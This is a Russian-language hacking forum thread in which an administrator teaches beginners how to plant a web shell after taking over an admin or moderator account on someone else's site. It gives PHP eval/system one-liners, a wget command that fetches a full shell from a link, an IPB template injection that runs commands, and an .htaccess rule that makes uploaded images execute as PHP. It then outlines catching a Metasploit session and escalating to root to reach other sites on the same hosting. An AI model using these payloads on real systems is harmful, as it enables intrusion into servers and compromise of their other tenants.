RCE/PHP injection и RCE IPB в шаблоне

lukeone

Магистр
Администратор
hackerville
Сообщения
20
Реакции
16
Юные хацкеры часто пишут мне в тг и говорят о том, что у них есть админ аккаунт, а что делать дальше не знают, постараюсь расписать процесс заливки шелла и повышения привилегий.

Условия:
1. Админ/модер/менеджер аккаунт
2. Редактирование кода
3. Заливка файлов (если такое есть то вообще всё просто)

Эксплуатация:

1.
В случае если у вас есть возможность редактировать код сайта, при условии, что сайт на пхп. Заливаем код, к примеру в index.php
PHP:
<?php
eval($_GET['code']);
?>
или
PHP:
<?php
system($_GET['code']);
?>
После проверяем site.com/index.php?code=ls; (это если систем залили). В ответ вы должны увидеть файлы которые лежат в этой директории, если всё классно, то заливаем полноценный шелл site.com/index.php?code="wget ссылка на шелл" и переходим по нему site.com/shell.php

Был интересный случай, когда был юзер с правами модера на форуме c cms IPB. Там был доступ к добавлению и изменению шаблона.
Открываем rce с помощью шаблона на IPB:

Код:
<if="$this->ipsclass->input['testKey'] = 123">
<if="system($this->ipsclass->input['code'])"></if>
</if>

2. В случае если у вас доступна загрузка файлов, но разрешены только расширения jpg,png и т.д. Нужно создать и залить .htaccess, в котором файл с доступным вам расширением будет выполняться как php.
Пример htaccess:
Код:
<IfModule mod_mime.c>
AddType application/x-httpd-php .php
AddType application/x-httpd-php .htm
AddType application/x-httpd-php .html
AddType application/x-httpd-php .tpl
</IfModule>
И главный вопрос, что делать дальше?

1. Компилируете полезную нагрузку в метасплоите
2. Ловите сессию в мсф
3. Подгружаете модули и пытаетесь сделать рут права.

Очень частый вопрос "Нахуя?"

Ответ: В большинстве случаев, все сайты находятся на хостинге, где висят ещё сайты, с рут правами, вы получите доступ ко всем, а в лучшем случае, если хостинги в 1 виртуальной сети, к примеру, можно попробовать попасть на другой сервер...
 
  • Like
Реакции: exploit

lukeone

Магистр
Администратор
hackerville
Сообщения
20
Реакции
16
А если нельзя редактировать код? Труба?
это план действий после того как у тебя админ или модер права есть, почти везде есть способы как то редактировать код)